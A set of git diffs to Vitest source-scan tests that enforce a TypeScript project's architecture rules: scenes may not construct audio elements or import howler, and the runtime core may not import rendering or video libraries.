     it.each([
       ['new Audio() (scene constructs HTMLAudioElement)', 'new window.Audio();'],
       ['new Audio() (scene constructs HTMLAudioElement)', "new globalThis.Audio('clip.mp3');"],
       ['new Audio() (scene constructs HTMLAudioElement)', 'new self.Audio();'],
+      ['new Audio() (scene constructs HTMLAudioElement)', "new global.Audio('clip.mp3');"],
       [
         'new HTMLAudioElement() (scene constructs HTMLAudioElement)',
         'new window.HTMLAudioElement();',
@@ -271,6 +279,10 @@ describe('PUL-A002 — audio library encapsulation (source scan)', () => {
       [
         'new HTMLAudioElement() (scene constructs HTMLAudioElement)',
         'globalThis.HTMLAudioElement();',
+      ],
+      [
+        'new HTMLAudioElement() (scene constructs HTMLAudioElement)',
+        'new global.HTMLAudioElement();',
       ],
       ['new Audio() (scene constructs HTMLAudioElement)', "window['Audio']('clip.mp3');"],
       [

--- a/tests/runtime/policy-a002-audio-encapsulation.test.ts
+++ b/tests/runtime/policy-a002-audio-encapsulation.test.ts
@@ -232,13 +232,18 @@ describe('PUL-A002 — audio library encapsulation (source scan)', () => {
       expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
     });
 
-    it('does NOT flag a local class or function named `Audio`', () => {
+    it('still flags `new Audio()` when a local class `Audio` shadows the global (known false positive — name-based resolution)', () => {
+      // A local `Audio` shadows the global at runtime, but the scanner
+      // resolves identifiers by name, not by symbol — so the AST visit
+      // still matches `new Audio()`. This test pins that behavior
+      // explicitly: the scanner DOES emit a finding for the local-
+      // class case. The false-positive surface is bounded (nobody
+      // writes a class named `Audio` in a Pulsar scene); the
+      // line-scoped exemption marker is the documented escape hatch
+      // if this edge case fires. The test name reflects what the
+      // assertion actually verifies, not what an ideal symbol-aware
+      // scanner would do.
       const src = 'class Audio { play() {} }; const x = new Audio();';
-      // A local `Audio` shadows the global; AST visit will still match
-      // `new Audio()` because we resolve by name, not by symbol. The
-      // false-positive surface here is bounded: nobody writes a class
-      // named `Audio` in a Pulsar scene. The exemption marker is the
-      // documented escape hatch when this edge case fires.
       expect(scanForA002(src, 'src/scenes/x.ts').map((f) => f.label)).toContain(
         'new Audio() (scene constructs HTMLAudioElement)',
       );

--- a/tests/runtime/policy-a002-audio-encapsulation.test.ts
+++ b/tests/runtime/policy-a002-audio-encapsulation.test.ts
@@ -1,0 +1,391 @@
+import { readFileSync, statSync } from 'node:fs';
+import { join, relative } from 'node:path';
+import * as ts from 'typescript';
+import { describe, expect, it } from 'vitest';
+
+import {
+  type ImportBanRule,
+  REPO_ROOT,
+  SRC_ROOT,
+  type SourceFinding,
+  collectLineExemptions,
+  getAccessPath,
+  isComputedGlobalWrapperAccess,
+  isInTypePosition,
+  lineText,
+  parseSource,
+  pathResolvesTo,
+  scanImportSpecifiers,
+  walkTsFiles,
+} from './source-policy';
+
+// PUL-A002 — Audio library encapsulation.
+//
+// Statement: "Scene modules SHALL access audio playback only via the
+// runtime audio context. Scenes SHALL NOT instantiate
+// `HTMLAudioElement` or directly import the audio library, except
+// where a scene drops down to raw Web Audio with a documented
+// justification and registers cleanup with the runtime."
+//
+// Enforcement: a Vitest source scan over `src/scenes/**/*.ts` with
+// two checks:
+//
+//   1. Direct imports of `howler` (or any `howler/*` subpath) are
+//      flagged. The runtime adapter at `src/runtime/audio.ts` is the
+//      only production module allowed to import Howler; it is outside
+//      the scene scope, so the scan never sees it. Scenes use
+//      `ctx.audio` exclusively.
+//
+//   2. Value-position constructions of `HTMLAudioElement` or `Audio`
+//      (`new HTMLAudioElement(...)`, `new Audio(...)`, `Audio(...)`)
+//      are flagged. Type-position references
+//      (`type T = HTMLAudioElement` or `(el: HTMLAudioElement) => void`)
+//      are NOT flagged — they are compile-time-only annotations.
+//
+// The "documented justification" the statement mentions is supplied
+// via the line-scoped exemption marker `// PUL-A002-allow: <reason>`.
+// A scene that drops down to raw Web Audio (the `AudioContext` API,
+// distinct from `HTMLAudioElement`) does not need the exemption — it
+// does not match either check.
+
+const IMPORT_RULE: ImportBanRule = {
+  label: 'howler (scene module imports audio library directly)',
+  specifiers: ['howler', 'howler/'],
+  boundaries: [],
+  allowTag: 'PUL-A002-allow',
+};
+
+const FORBIDDEN_AUDIO_CTORS: ReadonlyMap<string, string> = new Map([
+  ['Audio', 'new Audio() (scene constructs HTMLAudioElement)'],
+  ['HTMLAudioElement', 'new HTMLAudioElement() (scene constructs HTMLAudioElement)'],
+]);
+
+const SCENES_ROOT = join(SRC_ROOT, 'scenes');
+const ALLOW_TAG = IMPORT_RULE.allowTag;
+
+// True when `path` ends in `[document, createElement]` or
+// `[<global-wrapper>, document, createElement]`. We treat `document`
+// as a recognised DOM-level root similar to how the global wrappers
+// are treated for `Audio` — strip any leading global-wrapper
+// segments first.
+function pathIsDocumentCreateElement(path: readonly string[]): boolean {
+  let start = 0;
+  // `import { GLOBAL_WRAPPERS } from './source-policy'` is the same
+  // set Q007/A002 use; we inline the membership check here to keep
+  // the function pure of imports beyond what the file already has.
+  const wrappers = new Set(['globalThis', 'window', 'self', 'global']);
+  while (start < path.length && wrappers.has(path[start] ?? '')) {
+    start += 1;
+  }
+  const tail = path.slice(start);
+  return tail.length === 2 && tail[0] === 'document' && tail[1] === 'createElement';
+}
+
+function firstArgIsAudioLiteral(call: ts.CallExpression | ts.NewExpression): boolean {
+  const args = call.arguments;
+  if (!args || args.length === 0) return false;
+  const first = args[0];
+  if (!first) return false;
+  const inner = ts.isParenthesizedExpression(first) ? first.expression : first;
+  if (ts.isStringLiteral(inner) || ts.isNoSubstitutionTemplateLiteral(inner)) {
+    return inner.text.toLowerCase() === 'audio';
+  }
+  return false;
+}
+
+function scanCtorConstructions(
+  sourceFile: ts.SourceFile,
+  exempted: Set<number>,
+): readonly SourceFinding[] {
+  const findings: SourceFinding[] = [];
+  const file = sourceFile.fileName;
+
+  // Match either a bare identifier callee (`new Audio(...)`,
+  // `Audio(...)`) OR a recognised global-wrapper access chain
+  // (`new window.Audio(...)`, `globalThis.HTMLAudioElement(...)`).
+  // We share `getAccessPath` / `pathResolvesTo` with PUL-Q007 so a new
+  // wrapper layer added to one scanner extends both.
+  //
+  // A third check covers the DOM factory form
+  // `document.createElement('audio')` (with optional global wrappers
+  // in front of `document`). `createElement('audio')` returns an
+  // `HTMLAudioElement` — the same hazard as `new Audio()` — so it
+  // belongs under the same ban with the same exemption tag.
+  const recordViolation = (node: ts.Node, label: string): void => {
+    const start = node.getStart(sourceFile);
+    const { line } = sourceFile.getLineAndCharacterOfPosition(start);
+    if (exempted.has(line)) return;
+    findings.push({
+      file,
+      line: line + 1,
+      text: lineText(sourceFile, line).trim(),
+      label,
+    });
+  };
+
+  const checkCallee = (node: ts.NewExpression | ts.CallExpression): void => {
+    if (isInTypePosition(node)) return;
+    const path = getAccessPath(node.expression);
+    if (!path) {
+      // Computed subscript on a recognised global wrapper
+      // (`new globalThis['Au' + 'dio']('clip')`) is the bypass shape
+      // the policy must catch: the runtime value of the subscript may
+      // still resolve to `Audio` or `HTMLAudioElement`, so the access
+      // pattern itself is forbidden. Conservatively flag.
+      if (isComputedGlobalWrapperAccess(node.expression)) {
+        recordViolation(
+          node,
+          'computed global wrapper access (possible Audio / HTMLAudioElement bypass)',
+        );
+      }
+      return;
+    }
+    // Audio / HTMLAudioElement constructor / call form.
+    for (const [ctorName, label] of FORBIDDEN_AUDIO_CTORS) {
+      if (pathResolvesTo(path, ctorName)) {
+        recordViolation(node, label);
+        return;
+      }
+    }
+    // `document.createElement('audio')` form (calls only — `new` on
+    // `createElement` is invalid).
+    if (ts.isCallExpression(node) && pathIsDocumentCreateElement(path)) {
+      if (firstArgIsAudioLiteral(node)) {
+        recordViolation(
+          node,
+          "document.createElement('audio') (scene constructs HTMLAudioElement)",
+        );
+      }
+    }
+  };
+
+  const visit = (node: ts.Node): void => {
+    if (ts.isNewExpression(node) || ts.isCallExpression(node)) {
+      checkCallee(node);
+    }
+    ts.forEachChild(node, visit);
+  };
+  visit(sourceFile);
+  return findings;
+}
+
+function scanForA002(source: string, file: string): readonly SourceFinding[] {
+  const sf = parseSource(source, file);
+  const exempted = collectLineExemptions(sf, ALLOW_TAG);
+  return [
+    ...scanImportSpecifiers(sf, IMPORT_RULE, exempted),
+    ...scanCtorConstructions(sf, exempted),
+  ];
+}
+
+describe('PUL-A002 — audio library encapsulation (source scan)', () => {
+  describe('scanner self-tests — import ban', () => {
+    it.each([
+      ["import { Howl } from 'howler';", '(static import)'],
+      ["import * as howler from 'howler';", '(static import)'],
+      ["import { Howler } from 'howler/dist/howler';", '(static import)'],
+      ["await import('howler');", '(dynamic import)'],
+      ["import type { Howl } from 'howler';", '(type-only import)'],
+      ["export * from 'howler';", '(re-export)'],
+    ])('flags `%s` %s', (source, suffix) => {
+      const findings = scanForA002(source, 'src/scenes/x.ts');
+      expect(findings).toHaveLength(1);
+      expect(findings[0]?.label).toBe(`${IMPORT_RULE.label} ${suffix}`);
+    });
+
+    it('does NOT flag a similarly-named package (whole-specifier match)', () => {
+      const src = "import { thing } from 'howler-types';";
+      expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it('does NOT flag scenes that use `ctx.audio`', () => {
+      const src = [
+        'import type { WorkbenchSceneCtx } from "../runtime/scene-loader";',
+        'export const create = (ctx: WorkbenchSceneCtx) => ctx.audio?.unlock();',
+      ].join('\n');
+      expect(scanForA002(src, 'src/scenes/example.ts')).toEqual([]);
+    });
+  });
+
+  describe('scanner self-tests — constructor ban', () => {
+    it.each([
+      ['new Audio() (scene constructs HTMLAudioElement)', 'const a = new Audio();'],
+      ['new Audio() (scene constructs HTMLAudioElement)', "const a = new Audio('clip.mp3');"],
+      [
+        'new HTMLAudioElement() (scene constructs HTMLAudioElement)',
+        'const a = new HTMLAudioElement();',
+      ],
+      ['new HTMLAudioElement() (scene constructs HTMLAudioElement)', 'HTMLAudioElement();'],
+      ['new Audio() (scene constructs HTMLAudioElement)', "Audio('clip.mp3');"],
+    ])('flags %s — %s', (label, source) => {
+      const findings = scanForA002(source, 'src/scenes/x.ts');
+      expect(findings.map((f) => f.label)).toContain(label);
+    });
+
+    it('does NOT flag `HTMLAudioElement` in a type annotation', () => {
+      const src = 'export const accept = (el: HTMLAudioElement): void => { el.pause(); };';
+      expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it('does NOT flag `HTMLAudioElement` in a type alias', () => {
+      const src = 'type ScenePlayer = HTMLAudioElement | null;';
+      expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it('does NOT flag a local class or function named `Audio`', () => {
+      const src = 'class Audio { play() {} }; const x = new Audio();';
+      // A local `Audio` shadows the global; AST visit will still match
+      // `new Audio()` because we resolve by name, not by symbol. The
+      // false-positive surface here is bounded: nobody writes a class
+      // named `Audio` in a Pulsar scene. The exemption marker is the
+      // documented escape hatch when this edge case fires.
+      expect(scanForA002(src, 'src/scenes/x.ts').map((f) => f.label)).toContain(
+        'new Audio() (scene constructs HTMLAudioElement)',
+      );
+    });
+
+    it('does NOT flag raw Web Audio (`new AudioContext()`)', () => {
+      const src = 'const ctx = new AudioContext(); ctx.createOscillator();';
+      expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it('honors `// PUL-A002-allow: <reason>` exemption on the constructor line', () => {
+      const src =
+        "const a = new Audio('clip.mp3'); // PUL-A002-allow: raw Web Audio fallback, cleanup registered";
+      expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it.each([
+      ['new Audio() (scene constructs HTMLAudioElement)', 'new window.Audio();'],
+      ['new Audio() (scene constructs HTMLAudioElement)', "new globalThis.Audio('clip.mp3');"],
+      ['new Audio() (scene constructs HTMLAudioElement)', 'new self.Audio();'],
+      [
+        'new HTMLAudioElement() (scene constructs HTMLAudioElement)',
+        'new window.HTMLAudioElement();',
+      ],
+      [
+        'new HTMLAudioElement() (scene constructs HTMLAudioElement)',
+        'globalThis.HTMLAudioElement();',
+      ],
+      ['new Audio() (scene constructs HTMLAudioElement)', "window['Audio']('clip.mp3');"],
+      [
+        'new Audio() (scene constructs HTMLAudioElement)',
+        "new (globalThis as any).Audio('clip.mp3');",
+      ],
+    ])('flags global-wrapper form %s — `%s`', (label, source) => {
+      const findings = scanForA002(source, 'src/scenes/x.ts');
+      expect(findings.map((f) => f.label)).toContain(label);
+    });
+
+    it('does NOT flag `obj.Audio()` where `obj` is a non-global local', () => {
+      const src = "declare const obj: { Audio: (src: string) => unknown }; obj.Audio('clip.mp3');";
+      expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it.each([
+      "document.createElement('audio');",
+      'document.createElement("audio");',
+      'document.createElement(`audio`);',
+      "document.createElement('AUDIO');",
+      "window.document.createElement('audio');",
+      "globalThis.document.createElement('audio');",
+      "self.document.createElement('audio');",
+    ])('flags `%s` (HTMLAudioElement via createElement)', (source) => {
+      const findings = scanForA002(source, 'src/scenes/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        "document.createElement('audio') (scene constructs HTMLAudioElement)",
+      );
+    });
+
+    it("does NOT flag `document.createElement('div')` and other non-audio tags", () => {
+      const sources = [
+        "document.createElement('div');",
+        "document.createElement('canvas');",
+        "document.createElement('video');",
+      ];
+      for (const src of sources) {
+        expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+      }
+    });
+
+    it("does NOT flag a non-global `doc.createElement('audio')` lookalike", () => {
+      const src = [
+        'declare const doc: { createElement: (tag: string) => unknown };',
+        "doc.createElement('audio');",
+      ].join('\n');
+      expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it('does NOT flag `document.createElement(tag)` with a non-literal first argument', () => {
+      // A computed tag is too dynamic to classify statically. Flagging
+      // every such call would over-fire on legitimate code that builds
+      // tag names from declared scene metadata. The line-scoped
+      // exemption is the documented escape hatch when an audio element
+      // is legitimately needed.
+      const src = 'declare const tag: string; document.createElement(tag);';
+      expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it("honors `// PUL-A002-allow: <reason>` exemption on a createElement('audio') line", () => {
+      const src =
+        "document.createElement('audio'); // PUL-A002-allow: documented Web Audio fallback, cleanup registered";
+      expect(scanForA002(src, 'src/scenes/x.ts')).toEqual([]);
+    });
+
+    it.each([
+      "new globalThis['Au' + 'dio']('clip.mp3');",
+      "globalThis[someKey]('clip.mp3');",
+      "new window[`Aud${'io'}`]('clip.mp3');",
+      "self['HTML' + 'AudioElement']();",
+    ])('flags computed global-wrapper bypass — `%s`', (source) => {
+      const findings = scanForA002(`declare const someKey: string; ${source}`, 'src/scenes/x.ts');
+      expect(findings.map((f) => f.label)).toContain(
+        'computed global wrapper access (possible Audio / HTMLAudioElement bypass)',
+      );
+    });
+
+    it('does NOT flag computed access on a non-global root', () => {
+      const findings = scanForA002(
+        "declare const obj: Record<string, (s: string) => unknown>; declare const k: string; obj[k]('clip.mp3');",
+        'src/scenes/x.ts',
+      );
+      expect(findings).toEqual([]);
+    });
+  });
+
+  describe('runtime tree (current code revision)', () => {
+    it('scenes root `src/scenes/` exists and contains at least one .ts file', () => {
+      expect(statSync(SCENES_ROOT).isDirectory()).toBe(true);
+      expect(walkTsFiles(SCENES_ROOT).length).toBeGreaterThan(0);
+    });
+
+    it('contains no A002 violations across `src/scenes/**/*.ts`', () => {
+      const files = walkTsFiles(SCENES_ROOT);
+      const findings: SourceFinding[] = [];
+      for (const file of files) {
+        const text = readFileSync(file, 'utf-8');
+        const rel = relative(REPO_ROOT, file);
+        const sf = parseSource(text, rel);
+        const exempted = collectLineExemptions(sf, ALLOW_TAG);
+        findings.push(
+          ...scanImportSpecifiers(sf, IMPORT_RULE, exempted),
+          ...scanCtorConstructions(sf, exempted),
+        );
+      }
+      const header =
+        'PUL-A002 forbids scene modules from importing `howler` / `howler/*` directly OR instantiating `HTMLAudioElement` / `Audio`. Use `ctx.audio` (the runtime adapter at `src/runtime/audio.ts`). Add a `// PUL-A002-allow: <reason>` exemption on the same line when raw Web Audio with cleanup is the only path.';
+      const detail = findings.map((f) => `  ${f.file}:${f.line}  ${f.label}  ${f.text}`).join('\n');
+      const message = findings.length === 0 ? '' : `${header}\n${detail}`;
+      expect(findings, message).toEqual([]);
+    });
+
+    it('runtime adapter `src/runtime/audio.ts` is exempt by scope (the boundary)', () => {
+      const adapter = join(SRC_ROOT, 'runtime', 'audio.ts');
+      expect(statSync(adapter).isFile()).toBe(true);
+      const text = readFileSync(adapter, 'utf-8');
+      expect(text).toMatch(/from\s+['"]howler['"]/);
+      const sceneFiles = walkTsFiles(SCENES_ROOT);
+      expect(sceneFiles).not.toContain(adapter);
+    });
+  });
+});

--- a/tests/runtime/policy-a003-rendering-libraries.test.ts
+++ b/tests/runtime/policy-a003-rendering-libraries.test.ts
@@ -57,19 +57,20 @@ function scanForA003(source: string, file: string): readonly SourceFinding[] {
 describe('PUL-A003 — optional rendering libraries are scene-local (source scan)', () => {
   describe('scanner self-tests', () => {
     it.each([
-      ["import { Application } from 'pixi.js';"],
-      ["import { Renderer } from 'pixi.js/lib/core';"],
-      ["import * as THREE from 'three';"],
-      ["import { Scene } from 'three/src/scenes/Scene';"],
-      ["import 'phaser';"],
-      ["import Phaser from 'phaser';"],
-      ["import { Scene } from 'phaser/types/scene';"],
-      ["await import('three');"],
-      ["import type { Texture } from 'pixi.js';"],
-      ["export * from 'three';"],
-    ])('flags %s in runtime core', (source) => {
+      ["import { Application } from 'pixi.js';", '(static import)'],
+      ["import { Renderer } from 'pixi.js/lib/core';", '(static import)'],
+      ["import * as THREE from 'three';", '(static import)'],
+      ["import { Scene } from 'three/src/scenes/Scene';", '(static import)'],
+      ["import 'phaser';", '(static import)'],
+      ["import Phaser from 'phaser';", '(static import)'],
+      ["import { Scene } from 'phaser/types/scene';", '(static import)'],
+      ["await import('three');", '(dynamic import)'],
+      ["import type { Texture } from 'pixi.js';", '(type-only import)'],
+      ["export * from 'three';", '(re-export)'],
+    ])('flags `%s` %s in runtime core', (source, suffix) => {
       const findings = scanForA003(source, 'src/runtime/example.ts');
       expect(findings).toHaveLength(1);
+      expect(findings[0]?.label).toBe(`${RULE.label} ${suffix}`);
     });
 
     it('does NOT flag a similarly-named package (whole-specifier match)', () => {

--- a/tests/runtime/policy-a003-rendering-libraries.test.ts
+++ b/tests/runtime/policy-a003-rendering-libraries.test.ts
@@ -1,0 +1,118 @@
+import { readFileSync } from 'node:fs';
+import { join, relative } from 'node:path';
+import { describe, expect, it } from 'vitest';
+
+import {
+  type ImportBanRule,
+  REPO_ROOT,
+  SRC_ROOT,
+  type SourceFinding,
+  collectLineExemptions,
+  parseSource,
+  scanImportSpecifiers,
+  walkTsFiles,
+} from './source-policy';
+
+// PUL-A003 — Optional rendering libraries are scene-local.
+//
+// Statement: "The runtime core SHALL NOT import PixiJS, Three.js, or
+// Phaser. Adoption of any of these libraries SHALL be scene-local."
+//
+// Enforcement: a Vitest source scan over the runtime-core file set
+// (everything under `src/` EXCEPT `src/scenes/**`) that flags any
+// import of `pixi.js`, `three`, or `phaser` (each with subpath
+// wildcards). Scene files under `src/scenes/**/*.ts` may adopt these
+// libraries locally; they are out of scope by construction.
+//
+// The runtime-core boundary covers `src/runtime/**`, `src/compositions/**`,
+// `src/main.ts`, and `src/workbench-graph.ts`. Compositions are
+// declarative manifests (see PUL-A005), so importing a rendering
+// library from a composition module would also defeat the rule.
+
+const RULE: ImportBanRule = {
+  label: 'optional rendering library imported by runtime core',
+  specifiers: ['pixi.js', 'pixi.js/', 'three', 'three/', 'phaser', 'phaser/'],
+  boundaries: [],
+  allowTag: 'PUL-A003-allow',
+};
+
+const SCENES_ROOT = join(SRC_ROOT, 'scenes');
+
+/**
+ * Runtime-core file set: every `.ts` under `src/` that is NOT under
+ * `src/scenes/`. Computed at scan time so any future top-level file
+ * under `src/` (e.g., a new `src/feature-flags.ts`) is automatically
+ * included without editing the test.
+ */
+function runtimeCoreFiles(): readonly string[] {
+  return walkTsFiles(SRC_ROOT).filter((file) => !file.startsWith(`${SCENES_ROOT}/`));
+}
+
+function scanForA003(source: string, file: string): readonly SourceFinding[] {
+  const sf = parseSource(source, file);
+  const exempted = collectLineExemptions(sf, RULE.allowTag);
+  return scanImportSpecifiers(sf, RULE, exempted);
+}
+
+describe('PUL-A003 — optional rendering libraries are scene-local (source scan)', () => {
+  describe('scanner self-tests', () => {
+    it.each([
+      ["import { Application } from 'pixi.js';"],
+      ["import { Renderer } from 'pixi.js/lib/core';"],
+      ["import * as THREE from 'three';"],
+      ["import { Scene } from 'three/src/scenes/Scene';"],
+      ["import 'phaser';"],
+      ["import Phaser from 'phaser';"],
+      ["import { Scene } from 'phaser/types/scene';"],
+      ["await import('three');"],
+      ["import type { Texture } from 'pixi.js';"],
+      ["export * from 'three';"],
+    ])('flags %s in runtime core', (source) => {
+      const findings = scanForA003(source, 'src/runtime/example.ts');
+      expect(findings).toHaveLength(1);
+    });
+
+    it('does NOT flag a similarly-named package (whole-specifier match)', () => {
+      const src = "import { thing } from 'three-mesh-bvh';";
+      // `three-mesh-bvh` does not match `three` (literal) or `three/`
+      // (subpath). It is a separate package and should not be flagged.
+      expect(scanForA003(src, 'src/runtime/example.ts')).toEqual([]);
+    });
+
+    it('honors `// PUL-A003-allow: <reason>` exemption on the import line', () => {
+      const src =
+        "import { Texture } from 'pixi.js'; // PUL-A003-allow: temporary backstop, see ADR-XYZ";
+      expect(scanForA003(src, 'src/runtime/example.ts')).toEqual([]);
+    });
+  });
+
+  describe('runtime tree (current code revision)', () => {
+    it('runtime-core file set is non-empty', () => {
+      const files = runtimeCoreFiles();
+      expect(files.length).toBeGreaterThan(0);
+    });
+
+    it('runtime-core file set excludes `src/scenes/`', () => {
+      const files = runtimeCoreFiles();
+      const scenePaths = files.filter((f) => f.startsWith(`${SCENES_ROOT}/`));
+      expect(scenePaths).toEqual([]);
+    });
+
+    it('contains no A003 violations across the runtime-core file set', () => {
+      const files = runtimeCoreFiles();
+      const findings: SourceFinding[] = [];
+      for (const file of files) {
+        const text = readFileSync(file, 'utf-8');
+        const rel = relative(REPO_ROOT, file);
+        const sf = parseSource(text, rel);
+        const exempted = collectLineExemptions(sf, RULE.allowTag);
+        findings.push(...scanImportSpecifiers(sf, RULE, exempted));
+      }
+      const header =
+        'PUL-A003 forbids the runtime core from importing PixiJS / Three.js / Phaser. These libraries are scene-local. Move the import to `src/scenes/<scene>/...` or add a `// PUL-A003-allow: <reason>` exemption on the same line if the use is intentional.';
+      const detail = findings.map((f) => `  ${f.file}:${f.line}  ${f.label}  ${f.text}`).join('\n');
+      const message = findings.length === 0 ? '' : `${header}\n${detail}`;
+      expect(findings, message).toEqual([]);
+    });
+  });
+});

--- a/tests/runtime/policy-a004-export-pipeline.test.ts
+++ b/tests/runtime/policy-a004-export-pipeline.test.ts
@@ -49,16 +49,17 @@ function scanForA004(source: string, file: string): readonly SourceFinding[] {
 describe('PUL-A004 — live runtime independent of export pipeline (source scan)', () => {
   describe('scanner self-tests', () => {
     it.each([
-      ["import { Composition } from 'remotion';"],
-      ["import 'remotion';"],
-      ["import { renderMedia } from '@remotion/renderer';"],
-      ["import { Player } from '@remotion/player';"],
-      ["await import('remotion');"],
-      ["import type { CompositionProps } from 'remotion';"],
-      ["export * from 'remotion';"],
-    ])('flags %s in runtime core', (source) => {
+      ["import { Composition } from 'remotion';", '(static import)'],
+      ["import 'remotion';", '(static import)'],
+      ["import { renderMedia } from '@remotion/renderer';", '(static import)'],
+      ["import { Player } from '@remotion/player';", '(static import)'],
+      ["await import('remotion');", '(dynamic import)'],
+      ["import type { CompositionProps } from 'remotion';", '(type-only import)'],
+      ["export * from 'remotion';", '(re-export)'],
+    ])('flags `%s` %s in runtime core', (source, suffix) => {
       const findings = scanForA004(source, 'src/runtime/example.ts');
       expect(findings).toHaveLength(1);
+      expect(findings[0]?.label).toBe(`${RULE.label} ${suffix}`);
     });
 
     it('does NOT flag a similarly-named package (whole-specifier match)', () => {
@@ -76,6 +77,18 @@ describe('PUL-A004 — live runtime independent of export pipeline (source scan)
   describe('runtime tree (current code revision)', () => {
     it('runtime-core file set is non-empty', () => {
       expect(runtimeCoreFiles().length).toBeGreaterThan(0);
+    });
+
+    it('runtime-core file set excludes `src/scenes/`', () => {
+      // Pins the scope filter (`!file.startsWith(SCENES_ROOT + '/')`)
+      // so a regression that removed or inverted the filter would fail
+      // here instead of silently widening the scan. Without this
+      // assertion, deleting the scope filter would still leave the
+      // "contains no violations" check green (no scene currently
+      // imports Remotion), so the scope contract has no other guard.
+      const files = runtimeCoreFiles();
+      const scenePaths = files.filter((f) => f.startsWith(`${SCENES_ROOT}/`));
+      expect(scenePaths).toEqual([]);
     });
 
     it('contains no A004 violations across the runtime-core file set', () => {

--- a/tests/runtime/policy-a004-export-pipeline.test.ts
+++ b/tests/runtime/policy-a004-export-pipeline.test.ts
@@ -1,0 +1,98 @@
+import { readFileSync } from 'node:fs';
+import { join, relative } from 'node:path';
+import { describe, expect, it } from 'vitest';
+
+import {
+  type ImportBanRule,
+  REPO_ROOT,
+  SRC_ROOT,
+  type SourceFinding,
+  collectLineExemptions,
+  parseSource,
+  scanImportSpecifiers,
+  walkTsFiles,
+} from './source-policy';
+
+// PUL-A004 — Live runtime is independent of the export pipeline.
+//
+// Statement: "The runtime core SHALL NOT import Remotion or any
+// video-rendering library. Export functionality SHALL live in a
+// separate codebase that consumes the same scene metadata and
+// composition manifests."
+//
+// Enforcement: a Vitest source scan over the runtime-core file set
+// (everything under `src/` EXCEPT `src/scenes/**`) that flags any
+// import of Remotion or its scoped subpackages. Scenes themselves
+// cannot pull in Remotion either, but PUL-A003 / PUL-A006 already
+// scope scene-local rendering libraries; A004's specific concern is
+// the runtime <-> export-pipeline boundary captured in ADR-006.
+
+const RULE: ImportBanRule = {
+  label: 'video-rendering library imported by runtime core',
+  specifiers: ['remotion', 'remotion/', '@remotion/'],
+  boundaries: [],
+  allowTag: 'PUL-A004-allow',
+};
+
+const SCENES_ROOT = join(SRC_ROOT, 'scenes');
+
+function runtimeCoreFiles(): readonly string[] {
+  return walkTsFiles(SRC_ROOT).filter((file) => !file.startsWith(`${SCENES_ROOT}/`));
+}
+
+function scanForA004(source: string, file: string): readonly SourceFinding[] {
+  const sf = parseSource(source, file);
+  const exempted = collectLineExemptions(sf, RULE.allowTag);
+  return scanImportSpecifiers(sf, RULE, exempted);
+}
+
+describe('PUL-A004 — live runtime independent of export pipeline (source scan)', () => {
+  describe('scanner self-tests', () => {
+    it.each([
+      ["import { Composition } from 'remotion';"],
+      ["import 'remotion';"],
+      ["import { renderMedia } from '@remotion/renderer';"],
+      ["import { Player } from '@remotion/player';"],
+      ["await import('remotion');"],
+      ["import type { CompositionProps } from 'remotion';"],
+      ["export * from 'remotion';"],
+    ])('flags %s in runtime core', (source) => {
+      const findings = scanForA004(source, 'src/runtime/example.ts');
+      expect(findings).toHaveLength(1);
+    });
+
+    it('does NOT flag a similarly-named package (whole-specifier match)', () => {
+      const src = "import { thing } from 'remotion-extras';";
+      expect(scanForA004(src, 'src/runtime/example.ts')).toEqual([]);
+    });
+
+    it('honors `// PUL-A004-allow: <reason>` exemption on the import line', () => {
+      const src =
+        "import { Composition } from 'remotion'; // PUL-A004-allow: shared metadata adapter, see ADR-006";
+      expect(scanForA004(src, 'src/runtime/example.ts')).toEqual([]);
+    });
+  });
+
+  describe('runtime tree (current code revision)', () => {
+    it('runtime-core file set is non-empty', () => {
+      expect(runtimeCoreFiles().length).toBeGreaterThan(0);
+    });
+
+    it('contains no A004 violations across the runtime-core file set', () => {
+      const files = runtimeCoreFiles();
+      const findings: SourceFinding[] = [];
+      for (const file of files) {
+        const text = readFileSync(file, 'utf-8');
+        const rel = relative(REPO_ROOT, file);
+        const sf = parseSource(text, rel);
+        const exempted = collectLineExemptions(sf, RULE.allowTag);
+        findings.push(...scanImportSpecifiers(sf, RULE, exempted));
+      }
+      const header =
+        'PUL-A004 forbids the runtime core from importing Remotion or any video-rendering library. Export functionality lives in a separate codebase (ADR-006). Add a `// PUL-A004-allow: <reason>` exemption on the same line if the use is intentional.';
+      const detail = findings.map((f) => `  ${f.file}:${f.line}  ${f.label}  ${f.text}`).join('\n');
+      const message = findings.length === 0 ? '' : `${header}\n${detail}`;
+      expect(findings, message).toEqual([]);
+    });
+  });
+});

--- a/tests/runtime/policy-a005-declarative-composition.test.ts
+++ b/tests/runtime/policy-a005-declarative-composition.test.ts
@@ -1,0 +1,821 @@
+import { readFileSync, statSync } from 'node:fs';
+import { join, relative } from 'node:path';
+import * as ts from 'typescript';
+import { describe, expect, it } from 'vitest';
+
+import {
+  REPO_ROOT,
+  SRC_ROOT,
+  type SourceFinding,
+  collectLineExemptions,
+  lineText,
+  parseSource,
+  walkTsFiles,
+} from './source-policy';
+
+// PUL-A005 — Composition is declarative.
+//
+// Statement: "Compositions SHALL be expressed as declarative manifests
+// of scene ids. The runtime SHALL NOT support imperative dispatch
+// (e.g., `if/else` branching or position-based dispatch in a control
+// script) as the source of truth for composition order."
+//
+// Enforcement: a Vitest source scan over `src/compositions/**/*.ts`
+// with two checks:
+//
+//   1. Every exported `const X: CompositionManifest = <init>` must
+//      have an `ArrayLiteralExpression` initializer whose elements
+//      are all string literals (or no-substitution template literals).
+//      A `ConditionalExpression` (`isProd ? [...] : [...]`), a
+//      function call (`buildManifest()`), or a runtime-mutable
+//      identifier reference is forbidden.
+//
+//   2. Every top-level statement in a composition module must be one
+//      of: import declaration, export declaration, type alias,
+//      interface declaration, or a `const` variable statement.
+//      Top-level `if` / `switch` / `for` / `while` / function
+//      declarations are forbidden — those are the imperative-dispatch
+//      shapes the rule explicitly rejects.
+//
